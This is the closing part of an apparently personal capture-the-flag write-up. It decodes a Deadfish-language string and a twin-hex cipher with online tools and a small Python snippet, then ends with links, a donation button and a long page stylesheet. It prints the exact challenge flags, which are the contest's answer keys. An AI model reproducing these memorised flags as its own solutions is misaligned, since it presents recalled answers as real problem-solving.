iisiiiisiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiioddddddddddddddddddddddddddddddddddddddddddddddddddddoiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiioddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddoiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiioiiiiiiiiiiioiiiiiiiodddddddddddddddddddddddddddddddddddddddddddddddddddddddodddddddddddddddddoioiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiodddddodddddddddddddddddddddddddodddddddddddddddddddddoiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiodddddddddddodddddddddodddddddddddddddddddoddddddddddddddddddddddddoiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiodddddddoiiiiiiiiiiiiiioddddddddddddddddddddoiiiiiioddoiiiiiiiiiiiiiiiiiiiiiiiio ``` At first i got stuck really bad in this chall. I was wondering wtf this was and funny story, that was before i knew that you can identify a cipher on this webpage <a href="https://www.dcode.fr/cipher-identifier">dcode_fr</a> and i forgot to mention this in the bee challenge coz i was also stuck there. There used to be another cipher identifier. This one <a href="https://www.boxentriq.com/code-breaking/cipher-identifier">boxentriq</a>. This one ain't as good these days, do note that. I highly recommend the first one. Anyway, copying the string to the webpage, i found out it was deadfish language. Decoding that here <a href="https://www.dcode.fr/deadfish-language">deadfish_decode</a>, got some ascii chars. ```python= #!/usr/bin/python3 # @author: mug3njutsu char = [104,52,107,45,105,116,123,68,51,52,100,95,70,49,115,104,95,76,52,110,103,117,97,103,101,125] flag = "".join(map(chr, char)) print(flag) ``` Running this -> ```bash= ┌──(mug3njutsu㉿Lenovo-Ideapad)-[~/ctf/h4k-it-2/easy_decode_COMPLETE] └─$ python3 a.py h4k-it{D34d_F1sh_L4nguage} ``` ### **Sixth chall: doublehexa** ``` Hello , I am hex. Can you find my brother? 1bg6dx5m41m46gh5ps19z4ty1r81b61n86i31mi5xt5sn1bc6lw6ab1b64wm5p31mf5sh5m71kn1v918x1bj65t6cv ``` We're given a file with a weird string. Based on the description, this is actually a twin-hex cipher. Found this website <a href="https://www.calcresult.com/misc/cyphers/twin-hex.html">twin_hex_decode</a> that was able to decode it, but you also had to decode the string a few times to get -> h4k-it{b1g_br0th3r_0f_h3x} That was the last solve for me. I also solved the two machines after the CTF but i don't feel like i did them to my level best. So, i'll let tahaa's writeup take over here. He's the author of the two machines, so, it'd be best to read the intended method. <a href="https://hackmd.io/@tahaafarooq/gameofhacks_machines">Tahaa Farooq machines writeup</a> <a href="https://www.buymeacoffee.com/mug3njutsu"><img class="bounce" src="https://img.buymeacoffee.com/button-api/?text=Buy me a coffee&emoji=&slug=vsalguero&button_colour=BD5FFF&font_colour=ffffff&font_family=Cookie&outline_colour=000000&coffee_colour=FFDD00"></a> <style> /*Bounce*/ @keyframes bounce { 0%, 5%, 15%, 25% { -webkit-transform: translateY(0); transform: translateY(0); } 10% { -webkit-transform: translateY(-20px); transform: translateY(-20px); } 20% { -webkit-transform: translateY(-10px); transform: translateY(-10px); } } .bounce{ animation: bounce 5s infinite; } </style> <style> .twitter a { font-family: "Roboto", "Noto Sans", "Open Sans", "sans-serif"; display: inline-flex; color: #fff; border-radius: 5px; background: #1b95e0; padding: .4em .8em; text-decoration: none; font-weight: bold; text-align: left; position: absolute; bottom:138px; left:300px; } </style> <div class="twitter" style="height: 35px; width: 300px;"><a target="_blank" rel="noopener noreferrer" href="https://twitter.com/mug3njutsu"> <svg height="20px" width="20px" style="margin-right: 5px; fill: #fff;" viewBox="0 0 512 512" preserveAspectRatio="none"> <path d="M459.37 151.716c.325 4.548.325 9.097.325 13.645 0 138.72-105.583 298.558-298.558 298.558-59.452 0-114.68-17.219-161.137-47.106 8.447.974 16.568 1.299 25.34 1.299 49.055 0 94.213-16.568 130.274-44.832-46.132-.975-84.792-31.188-98.112-72.772 6.498.974 12.995 1.624 19.818 1.624 9.421 0 18.843-1.3 27.614-3.573-48.081-9.747-84.143-51.98-84.143-102.985v-1.299c13.969 7.797 30.214 12.67 47.431 13.319-28.264-18.843-46.781-51.005-46.781-87.391 0-19.492 5.197-37.36 14.294-52.954 51.655 63.675 129.3 105.258 216.365 109.807-1.624-7.797-2.599-15.918-2.599-24.04 0-57.828 46.782-104.934 104.934-104.934 30.213 0 57.502 12.67 76.67 33.137 23.715-4.548 46.456-13.32 66.599-25.34-7.798 24.366-24.366 44.833-46.132 57.827 21.117-2.273 41.584-8.122 60.426-16.243-14.292 20.791-32.161 39.308-52.628 54.253z" /></a></div> <style> body[style], body[style*="background-color: white;"] { background-color: #1e1e1e !important; } body { color: #abb2bf; } .ui-view-area, .markdown-body, .ui-content { background: #1e1e1e; color: #abb2bf; } h1, h2, h3, h4, h5, h6, p { color: #ddd; } /* form */ .form-control { background: #333; color: #fff; border-color: #8e8e8e; } .form-control::placeholder, .form-control::-webkit-input-placeholder, .form-control:-moz-placeholder, .form-control::-moz-placeholder, .form-control:-ms-input-placeholder { color: #eee; } /*--------------- navbar ---------------*/ .header { background-color: #0e0e0e; border-color: #0e0e0e; } .navbar { background-color: #0e0e0e; border-color: #0e0e0e; } .navbar a { color: #eee !important; } .navbar .btn-group label { background-color: #0e0e0e; color: #eee; border-color: #555; } .navbar .btn-group label.btn-default:focus, .navbar .btn-group label.btn-default:hover { background-color: #2a2a2a; color: #eee; border-color: #555; } .navbar .btn-group label.active { background-color: #555; color: #eee; border-color: #555; } .navbar .btn-group label.active:focus, .navbar .btn-group label.active:hover { background-color: #555; color: #eee; border-color: #555; } .navbar-default .btn-link:focus, .navbar-default .btn-link:hover { color: #eee; } .navbar-default .navbar-nav>.open>a, .navbar-default .navbar-nav>.open>a:focus, .navbar-default .navbar-nav>.open>a:hover { background-color: #555; } .dropdown-header { color: #eee; } .dropdown-menu { background-color: #222; border: 1px solid #555; border-top: none; } .dropdown-menu>li>a { color: #eee; } .dropdown-menu>li>a:focus, .dropdown-menu>li>a:hover { background-color: #555555; color: #eee; } .dropdown-menu .divider { background-color: #555; } .header .open .dropdown-menu { background-color: #202020; } .ui-share-menu .ui-share-copy, .ui-share-menu .ui-share-preview { border-color: #6d6d6d !important; background-color: #333 !important; color: #FFF !important; } .ui-share-menu .ui-share-copy:hover, .ui-share-menu .ui-share-copy:focus, .ui-share-menu .ui-share-preview:hover, .ui-share-menu .ui-share-preview:focus { background-color: #737373 !important; color: #FFF !important; } .permission-dropdown .ui-more-settings, .permission-dropdown .sidenav-trigger { color: #7bf; } .public-published-toggle .unpublish:hover { background-color: #286090; } .menuitem-dropdown .menuitem-dropdown-trigger { border-color: #8e8e8e; } .menuitem-dropdown .menuitem-dropdown-trigger:hover, .menuitem-dropdown .menuitem-dropdown-trigger:focus { background-color: #3e4045; } .navbar .announcement-popover { background: #4F4F4F; } .navbar .announcement-popover .announcement-popover-header { background: #2e2e2e; border-bottom: 1px solid #2e2e2e; } .navbar .announcement-popover .announcement-popover-body { background: #4F4F4F; color: #eee; } .navbar .announcement-popover .announcement-popover-footer { background: #4F4F4F; } .navbar .announcement-area .caption.inverse { color: #eee; } .label-warning { background-color: #ffc107; color: #212529; } /*--------------- history / recent ---------------*/ .list.row-layout li .item { border-color: #696c7d; } .list.row-layout li:nth-last-of-type(1) .item { border-bottom: none; } .list li .item { background: #1c1c1c; color: #fff; } .list li:hover .item, .list li:focus .item { background: #404040; } .list li .item h4 { color: #fff; } .list li p { color: #ccc; } .list li p i { font-style: normal; } .list li .item .content .tags span { background: #555; } .list li .item.wide .content .title a, .list li .item.wide .content .title a:focus, .list li .item.wide .content .title a:hover { color: #ddd; } .ui-item { color: #fff; opacity: 0.7; } .ui-item:hover, .ui-item:focus { opacity: 1; color: #fff; } .list li .item.wide hr { border-color: #6d6d6d; } .overview-widget-group .btn, .multi-select-dropdown-menu .ui-dropdown-label, .multi-select-dropdown-menu .dropdown-options, .form-control { border-color: #8e8e8e; } .multi-select-dropdown-menu .dropdown-options .ui-option:hover { background-color: #4d4d4d; color: #eee; } #overview-control-form #overview-keyword-input-container .select2-container { background-color: #3e4045 !important; } #overview-control-form #overview-keyword-input-container .select2-container .select2-choices { background-color: #3e4045; } .search { background-color: #3e4045; color: #eee; } .btn.btn-gray { background: #1b1b1b; } .btn.btn-gray:hover { background: #4d4d4d; color: #eee; } .search::placeholder, .search::-webkit-input-placeholder, .search:-moz-placeholder, .search::-moz-placeholder, .search:-ms-input-placeholder { color: #eee; } .btn.btn-gray { border-color: #6d6d6d; background: #333; color: #eee; } .select2-default { color: #eee !important; } .select2-results .select2-highlighted { background: #4d4d4d; color: #eee; } .select2-container-multi .select2-choices { background: #3e4045; } .select2-container-multi .select2-choices .select2-search-choice { background: #131313; color: #eee; border-color: #555; box-shadow: none; } .btn-default, .btn-default:focus { color: #eee; background-color: #2e2e2e; border-color: #6a6a6a; } .btn-default.active.focus, .btn-default.active:focus, .btn-default.active:hover, .btn-default:active.focus, .btn-default:active:focus, .btn-default:active:hover, .open>.dropdown-toggle.btn-default.focus, .open>.dropdown-toggle.btn-default:focus, .open>.dropdown-toggle.btn-default:hover { background: #737373; } .btn-default:hover { color: #fff; background-color: #7d7d7d; border-color: #6a6a6a; } .overview-widget-group .btn.active { background-color: #6a6a6a; color: #eee; } .overview-widget-group .btn:hover { background-color: #7d7d7d; color: #eee; border-color: #636363; } .overview-widget-group .slider.round { border-color: #ccc; } .overview-widget-group .slider.round:before { border-color: #ccc; } .overview-widget-group input:checked+.slider { background-color: #ccc; } .ui-category-description-icon a { color: #eee; } .item .ui-history-pin.active { color: #f00; } .ui-history-close { color: #eee; opacity: 0.5; } .pagination>li>a, .pagination>li>span { color: #eee; background-color: #2e2e2e; border-color: #6a6a6a; } .pagination>li>a:hover { color: #fff; background-color: #7d7d7d; border-color: #6a6a6a; } .pagination>.disabled>a, .pagination>.disabled>a:focus, .pagination>.disabled>a:hover, .pagination>.disabled>span, .pagination>.disabled>span:focus, .pagination>.disabled>span:hover { color: #eee; background-color: #2e2e2e; border-color: #6a6a6a; } .pagination.dark>li>a, .pagination.dark>li>span { color: #aaa; } /*--------------- new overview ---------------*/ .overview-component .list li .item { background: #1c1c1c; color: #fff; } .overview-component .list li:hover .item, .overview-component .list li:focus .item { background: #404040; } .overview-component .list li p { color: #ccc; } .overview-component .list li .item { color: #888888; } .overview-component .ui-overview-pin { opacity: 1; } /*--------------- settings ---------------*/ .section .form-horizontal .form-group .btn-default { font-size: 16px; border-color: #6d6d6d; background-color: #333; color: #FFF; } .section .form-horizontal .form-group .btn-default:hover, .section .form-horizontal .form-group .btn-default:focus { background-color: #737373; color: #FFF; } .section .form-horizontal .form-control:focus { border-color: #bbb; } /*--------------- share view ---------------*/ #notificationLabel, .ui-infobar .btn.ui-edit { color: #eee; border-color: #6a6a6a; } .ui-infobar__user-info li { color: #bbb; } footer { background: #101010; color: #bbb; border-top: 1px solid #454545; } footer a { color: #bbb; } /*--------------- doc view ---------------*/ .markdown-body h1, .markdown-body h2, .markdown-body h3, .markdown-body h4, .markdown-body h5, .markdown-body h6, #doc>h1 { color: #ddd; border-color: #777 !important; } .markdown-body hr { background-color: #7e7e7e; } .h1 .small, .h1 small, .h2 .small, .h2 small, .h3 .small, .h3 small, .h4 .small, .h4 small, .h5 .small, .h5 small, .h6 .small, .h6 small, h1 .small, h1 small, h2 .small, h2 small, h3 .small, h3 small, h4 .small, h4 small, h5 .small, h5 small, h6 .small, h6 small { color: #ddd; } .markdown-body p { color: #ddd; } .markdown-body a { color: #7bf; } .markdown-body a code { color: #7bf !important; } .markdown-body ul li, .markdown-body ol li { color: #ddd; } .markdown-body blockquote { color: #ddd; border-left-color: #777; font-size: 16px; } .markdown-body code, code { color: #dfdfdf !important; background-color: #424a55; } .markdown-body code { padding: 1px 2px; } .markdown-body pre { background-color: #1e1e1e; border: 1px solid #555 !important; color: #dfdfdf; } .markdown-body details { margin-bottom: 16px; } blockquote .small, blockquote footer, blockquote small { color: #bbb; } .mark, mark { background-color: rgba(255, 255, 0, 0.32) !important; color: #ddd; margin: .1em; padding: .1em .2em; } /* Todo list */ .task-list-item-checkbox { margin: 0.18em 0 0.2em -1.3em !important; } .task-list-item input[type=checkbox] { -webkit-appearance: none; -moz-appearance: none; appearance: none; position: relative; top: -1px; margin: 0 1rem 0 0; cursor: pointer; } .task-list-item input[type=checkbox]::before { -webkit-transition: all 0.1s ease-in-out; -moz-transition: all 0.1s ease-in-out; transition: all 0.1s ease-in-out; content: ""; position: absolute; left: 0; z-index: 1; width: 16px; height: 16px; border: 2px solid #F44336; } .task-list-item input[type=checkbox]:checked::before { -webkit-transform: rotate(-48deg); -moz-transform: rotate(-48deg); -ms-transform: rotate(-48deg); -o-transform: rotate(-48deg); transform: rotate(-48deg); height: 9px; border-color: #00E676; border-top-style: none; border-right-style: none; } .task-list-item input[type=checkbox]::after { content: ""; position: absolute; top: -0.125rem; left: 0; width: 16px; height: 16px; background: #333; cursor: pointer; } /* table */ .markdown-body table tr { background-color: #1e1e1e; border-color: #626262; } .markdown-body table tr:last-child { border-bottom: 1px solid #626262; } .markdown-body table tr:nth-child(2n) { background-color: #333; } .markdown-body table tr th { color: #64B5F6; } .markdown-body table th, .markdown-body table td { border: none; border-color: #626262; } .markdown-body table tr td { color: #ddd; } .markdown-body table tr th:first-child, .markdown-body table tr td:first-child { border-left: 1px solid #626262; } .markdown-body table tr th:last-child, .markdown-body table tr td:last-child { border-right: 1px solid #626262; } .markdown-body pre.flow-chart, .markdown-body pre.sequence-diagram, .markdown-body pre.graphviz, .markdown-body pre.mermaid, .markdown-body pre.abc { background-color: #fff !important; } /* alert */ .alert-danger h1, .alert-danger h2, .alert-danger h3, .alert-danger h4, .alert-danger h5, .alert-danger h6, .alert-danger p, .alert-danger mark, .alert-danger ul li, .alert-danger ol li { color: #721c24; } .alert-danger hr { background-color: #721c24; } .alert-warning h1, .alert-warning h2, .alert-warning h3, .alert-warning h4, .alert-warning h5, .alert-warning h6, .alert-warning p, .alert-warning mark, .alert-warning ul li, .alert-warning ol li { color: #856404; } .alert-warning hr { background-color: #856404; } .alert-success h1, .alert-success h2, .alert-success h3, .alert-success h4, .alert-success h5, .alert-success h6, .alert-success p, .alert-success mark, .alert-success ul li, .alert-success ol li { color: #155724; } .alert-success hr { background-color: #155724; } .alert-info h1, .alert-info h2, .alert-info h3, .alert-info h4, .alert-info h5, .alert-info h6, .alert-info p, .alert-info mark, .alert-info ul li, .alert-info ol li { color: #004085; } .alert-info hr { background-color: #004085; } .alert a { color: #002752; font-weight: 700; } .alert h1:first-child, .alert h2:first-child, .alert h3:first-child, .alert h4:first-child, .alert h5:first-child, .alert h6:first-child { margin-top: 0; } .markdown-body .alert>p { margin-top: 0px; margin-bottom: 10px; } .markdown-body .alert>ul, .markdown-body .alert>ol { margin-bottom: 16px; } .markdown-body .alert>*:last-child { margin-bottom: 0; } .alert-warning { background-color: #fff3cd; border-color: #ffeeba; } .alert-danger mark { background-color: #ffb7b7 !important; } .alert-warning mark { background-color: #ffe966 !important; } .alert-success mark { background-color: #b9e990 !important; } .alert-info mark { background-color: #b1d6ff !important; } /* scroll bar */ .ui-edit-area .ui-resizable-handle.ui-resizable-e { background-color: #303030; border: 1px solid #303030; box-shadow: none; } /* info bar */ .ui-infobar { color: #999; } /* permission */ .permission-popover-btn-group .btn.focus, .permission-popover-btn-group .btn:active, .permission-popover-btn-group .btn:focus, .permission-popover-btn-group .btn.active { background-color: #6a6a6a !important; color: #eee !important; border-color: #555 !important; } .permission-popover-btn-group .btn:hover, .permission-popover-btn-group .btn.active:hover { background-color: #7d7d7d !important; color: #eee !important; border-color: #636363 !important; } .ui-delete-note:hover, .ui-delete-note:focus, .ui-delete-note:active { background-color: #dc3545 !important; } .ui-invitee-invite { border-color: #8e8e8e !important; } .ui-invitee-invite:hover, .ui-invitee-invite:focus { background-color: #737373; color: #eee !important; } .ui-no-invitee-label { color: #ccc !important; } .select2-container { background: #202020; } .select2-container-multi .select2-choices .select2-search-field input { color: #eee; } .select2-container-multi .select2-choices .select2-search-field input.select2-active { color: #000; } .select2-drop { background: #202020; color: #eee; } .select2-results .select2-no-results, .select2-results .select2-searching, .select2-results .select2-ajax-error, .select2-results .select2-selection-limit { background: #202020; } /* table of contents block*/ .ui-toc-dropdown { width: 42vw; max-height: 90vh; overflow: auto; text-align: inherit; } /* table of contents text*/ .ui-toc-dropdown .nav>li>a { font-size: 14px; font-weight: bold; color: #ddd; } /* table of contents text: active*/ .ui-toc-dropdown .nav>.active:focus>a, .ui-toc-dropdown .nav>.active:hover>a, .ui-toc-dropdown .nav>.active>a { color: #7bf; border-left-color: #7bf; } /* table of contents text: focus, hover*/ .ui-toc-dropdown .nav>li>a:focus, .ui-toc-dropdown .nav>li>a:hover { color: #7bf; border-left-color: #7bf; } /* drop down floating table of contents */ .ui-toc-dropdown.dropdown-menu { background: #333; } .toc-menu a { color: #ddd; } .toc-menu a:focus, .toc-menu a:hover { color: #7bf; } /*--------------- editor ---------------*/ .cm-m-markdown { color: #ddd; } .cm-s-one-dark .cm-header, .cm-m-xml.cm-attribute { color: #ffa653; } .cm-m-markdown.cm-variable-3 { color: #ff7e7e; } .cm-s-one-dark .cm-string, .cm-s-one-dark .cm-variable-2, .cm-s-one-dark .cm-m-markdown.cm-url{ color: #7bf; } .cm-s-one-dark .cm-m-markdown.cm-link { color: #b0ee83; } .cm-s-one-dark .CodeMirror-linenumber { color: #666; } .cm-strong { color: #f4511e; } .cm-s-one-dark .cm-comment { color: #a9a9a9; } .cm-matchhighlight { color: #ffea00; } .cm-positive { color: #11bf64; } .cm-negative { color: #ff3e3e; } .dropdown-menu.CodeMirror-other-cursor { border: 2px solid #4d4d4d; background-color: #202020; } .dropdown-menu.CodeMirror-other-cursor li a { color: #ececec; } /*--------------- book mode ---------------*/ .topbar { background: #1e1e1e; } .btn.focus, .btn:focus, .btn:hover { color: #fff; background-color: #333; } .summary { background: #1e1e1e; } .summary, .toolbar { background: #1e1e1e !important; border-color: #4d4d4d !important; } .toolbar i { color: #fff; } .summary h1, .summary h2, .summary h3 .summary hr { color: #ddd; border-color: #777 !important; } .summary .nav>li>a { color: #7bf; } .summary .nav-pills>li.active>a, .summary .nav-pills>li.active>a:focus, .summary .nav-pills>li.active>a:hover { color: #ff9100; } .ui-summary-search { font-size: 16px; border: 1px solid #6D6D6D; background-color: #333; color: #FFF; } .summary h1, .summary h2, .summary h3, .summary h4, .summary h5, .summary h6 { border-color: #454545; } /* fix body background color to dark */ div[class$=container-mask] { background: #1e1e1e; z-index: 1; display: block; } /* notification */ .dropdown.ui-notification .ui-notification-label, .dropdown.ui-invitee .ui-invitee-label { color: #eee; border-color: #6a6a6a; } .ui-notification .dropdown-menu { border-top: 1px solid #555; } /*--------------- help ---------------*/ .modal-header { background-color: #2a2a2a; } .panel-default { border-color: #6d6d6d; } .panel-default>.panel-heading { background-color: #2a2a2a; color: #eee; border-color: #6d6d6d; } .panel-body { background: #2e2e2e; } .panel-body a { color: #7bf; } .table>tbody>tr>td, .table>tbody>tr>th, .table>tfoot>tr>td, .table>tfoot>tr>th, .table>thead>tr>td, .table>thead>tr>th { border-color: #6d6d6d; } /*--------------- comment ---------------*/ .ui-comment-container .ui-comment-header { background-color: #2a2a2a; color: #eee; border-color: #6d6d6d; } .ui-comment-container { background-color: #2e2e2e; border-color: #6d6d6d; } .ui-comment-container .ui-comments-container .ui-comment .comment-author { color: #eee; } .ui-comment-container .ui-comments-container .ui-comment .timestamp { color: #aaa; } .ui-comment-container .ui-comments-container .ui-comment .comment-content { color: #eee; } .ui-comment-container .ui-comments-container .ui-comment .comment-menu { color: #eee; } .ui-comment-container .ui-comments-container .ui-comment .comment-menu .comment-dropdown-menu { background: #222; color: #eee; border-color: #555; } .ui-comment-container .ui-comments-container .ui-comment .comment-menu .comment-dropdown-menu>div:hover { background-color: #555555; color: #eee; } .ui-comment-container .ui-comments-container .ui-comment .comment-menu:hover, .ui-comment-container .ui-comments-container .ui-comment .comment-menu:active, .ui-comment-container .ui-comments-container .ui-comment .comment-menu.active { background-color: #737373; color: #eee; } .ui-comment-container .ui-comment-input-container { background-color: #3c3c3c; } .ui-comment-container textarea { background-color: #3e4045; color: #eee; border: 1px solid #6d6d6d; } .ui-comment-container textarea::placeholder, .ui-comment-container textarea::-webkit-input-placeholder, .ui-comment-container textarea:-moz-placeholder, .ui-comment-container textarea::-moz-placeholder, .ui-comment-container textarea:-ms-input-placeholder { color: #eee; } @keyframes highlight { 0% { background-color: #3c3c3c; } 30% { background-color: #3c3c3c; } 100% { background-color: transparent; } } /*--------------- template ---------------*/ .template-content .modal-header { background: #2a2a2a; } .template-content .close { color: #fff; } .template-content .modal-title { color: #eee; } .template-content .ui-templates-container { border-color: #6d6d6d; } .ui-templates-container .ui-create-template-btn { background: #446fab; color: #fff; } .ui-template-list-filter .ui-template-list-filter-label, .ui-template-list-filter .ui-template-list-filter-label:hover { color: #eee; } .ui-template-list .list-group-item.active { background: #4d4d4d; } .ui-template-list .list-group-item.active:focus { background: #4d4d4d !important; } .list-group-item.active, .list-group-item.active:focus, .list-group-item.active:hover { color: #eee; } .ui-template-list .list-group-item .list-group-item-heading { color: #eee; } .ui-template-list .list-group-item.active .list-group-item-heading { color: #eee; } .ui-template-list .list-group-item:hover { background: #4d4d4d !important; } .ui-template-item-menu { color: #eee !important; } .ui-template-list .list-group-item { color: #fff; } .ui-template-list .list-group-item .dropdown-container.open { background-color: #2a2a2a; } .ui-template-list .list-group-item .dropdown-container:hover { background-color: #2a2a2a !important; } .template-menu .more-template { border-color: #6d6d6d; } .template-menu .more-template:hover { color: #eee; border-color: #6d6d6d; } /*--------------- code mirror ---------------*/ .modal-content { background: #1f2226; } .modal-header { border-bottom: 1px solid #46484f; } .modal-footer { border-top: 1px solid #46484f; } a.list-group-item { background: #1f2226; color: #ddd; border: 1px solid #46484f; } a.list-group-item .list-group-item-heading { color: #ddd; } a.list-group-item:focus, a.list-group-item:hover { background: #434651; color: #ddd; } button.close { color: #ddd; opacity: .5; } .close:focus, .close:hover { color: #fff; opacity: .8; } .CodeMirror { background: #1f2226; } .CodeMirror-gutters { background: #1f2226; border-right: 1px solid rgba(204, 217, 255, 0.1); } .cm-s-default .cm-comment { color: #888; } .cm-s-default .cm-quote { color: #ddd; } .cm-s-default .cm-header { color: #ffa653; } .cm-s-default .cm-link { color: #b0ee83; } .cm-s-default .cm-string, .cm-s-default .cm-variable-2 { color: #7bf; } .cm-s-default .cm-def { color: #c678dd; } .cm-s-default .cm-number, .cm-s-default .cm-attribute, .cm-s-default .cm-qualifier, .cm-s-default .cm-plus, .cm-s-default .cm-atom { color: #eda35e; } .cm-s-default .cm-property, .cm-s-default .cm-variable, .cm-s-default .cm-variable-3, .cm-s-default .cm-operator, .cm-s-default .cm-bracket { color: #f76e79; } .cm-s-default .cm-keyword, .cm-s-default .cm-builtin, .cm-s-default .cm-tag { color: #98c379; } .modal-title { color: #ccc; } .modal-body { color: #ccc !important; } div[contenteditable]:empty:not(:focus):before { color: #aaa; } .CodeMirror pre { color: #ddd; } .CodeMirror pre span[style^="background-color: rgb(221, 251, 230)"] { background-color: #288c27 !important; } .CodeMirror pre span[style^="background-color: rgb(249, 215, 220)"] { background-color: #a52721 !important; } /*------- code highlight: Visual Stutdio Code theme for highlight.js -------*/ .hljs { background: #1E1E1E; color: #DCDCDC; } .hljs-keyword, .hljs-literal, .hljs-symbol, .hljs-name { color: #569CD6; } .hljs-link { color: #569CD6; text-decoration: underline; } .hljs-built_in, .hljs-type { color: #4EC9B0; } .hljs-number, .hljs-class { color: #B8D7A3; } .hljs-string, .hljs-meta-string { color: #D69D85; } .hljs-regexp, .hljs-template-tag { color: #d16969; } .hljs-title { color: #dcdcaa; } .hljs-subst, .hljs-function, .hljs-formula { color: #DCDCDC; } .hljs-comment, .hljs-quote { color: #57A64A; } .hljs-doctag { color: #608B4E; } .hljs-meta, .hljs-meta-keyword, .hljs-tag { color: #9B9B9B; } .hljs-variable, .hljs-template-variable { color: #BD63C5; } .hljs-params, .hljs-attr, .hljs-attribute, .hljs-builtin-name { color: #9CDCFE; } .hljs-section { color: gold; } .hljs-emphasis { font-style: italic; } .hljs-strong { font-weight: bold; } /* .hljs-code { font-family:'Monospace'; } */ .hljs-bullet, .hljs-selector-tag, .hljs-selector-id, .hljs-selector-class, .hljs-selector-attr, .hljs-selector-pseudo { color: #D7BA7D; } .hljs-addition { background-color: #155a36; color: #dfdfdf; display: inline-block; width: 100%; } .hljs-deletion { background-color: #872e2e; color: #dfdfdf; display: inline-block; width: 100%; } /*---------- code highlight: Visual Stutdio Code theme for Prism.js ----------*/ code[class*="language-"], pre[class*="language-"] { color: #DCDCDC; } :not(pre)>code[class*="language-"], pre[class*="language-"] { background: #1E1E1E; } .token.comment, .token.block-comment, .token.prolog, .token.cdata { color: #57A64A; } .token.doctype, .token.punctuation { color: #9B9B9B; } .token.tag, .token.entity { color: #569CD6; } .token.attr-name, .token.namespace, .token.deleted, .token.property, .token.builtin { color: #9CDCFE; } .token.function, .token.function-name { color: #dcdcaa; } .token.boolean, .token.keyword, .token.important { color: #569CD6; } .token.number { color: #B8D7A3; } .token.class-name, .token.constant { color: #4EC9B0; } .token.symbol { color: #f8c555; } .token.rule { color: #c586c0; } .token.selector { color: #D7BA7D; } .token.atrule { color: #cc99cd; } .token.string, .token.attr-value { color: #D69D85; } .token.char { color: #7ec699; } .token.variable { color: #BD63C5; } .token.regex { color: #d16969; } .token.operator { color: #DCDCDC; background: transparent; } .token.url { color: #67cdcc; } .token.important, .token.bold { font-weight: bold; } .token.italic { font-style: italic; } .token.entity { cursor: help; } .token.inserted { color: green; } /*---------- code highlight: dark theme for Gist ----------*/ .gist .gist-file { border: 1px solid #555; } .gist .gist-data { background-color: #1e1e1e; border-bottom: 1px solid #555; } .gist .gist-meta { background-color: #424a55; color: #eee; } .gist .gist-meta a { color: #eee; } .gist .highlight { color: #eee; background-color: #1e1e1e; } .gist .blob-num { color: #afafaf; } .gist .blob-code-inner { color: #dfdfdf; } .pl-mb { color: #fff !important; } .pl-c { color: #57A64A !important; } /* comment */ .pl-ent { color: #569CD6 !important; } /* entity */ .pl-e { color: #9CDCFE !important; } .pl-en { color: #4EC9B0 !important; } /* entity attribute */ .pl-smi { color: #9CDCFE !important; } .pl-k { color: #569cd6 !important; } .pl-c1, .pl-s .pl-v { color: #4EC9B0 !important; } .pl-pds, .pl-s, .pl-s .pl-pse .pl-s1, .pl-sr, .pl-sr .pl-cce, .pl-sr .pl-sra, .pl-sr .pl-sre, .pl-s .pl-s1 { color: #D69D85 !important; } .pl-s .pl-s1 .pl-pse { color: #c5dbff !important; } /* strings */ .diff-table .pl-c, .diff-table .pl-ent, .diff-table .pl-e, .diff-table .pl-en, .diff-table .pl-pds, .diff-table .pl-s, .diff-table .pl-s .pl-s1, .diff-table .pl-s .pl-pse .pl-s1, .diff-table .pl-sr, .diff-table .pl-sr .pl-cce, .diff-table .pl-sr .pl-sra, .diff-table .pl-sr .pl-sre, .diff-table .pl-k, .diff-table .pl-smi, .diff-table .pl-c1, .diff-table .pl-v { color: #eee !important; } </style>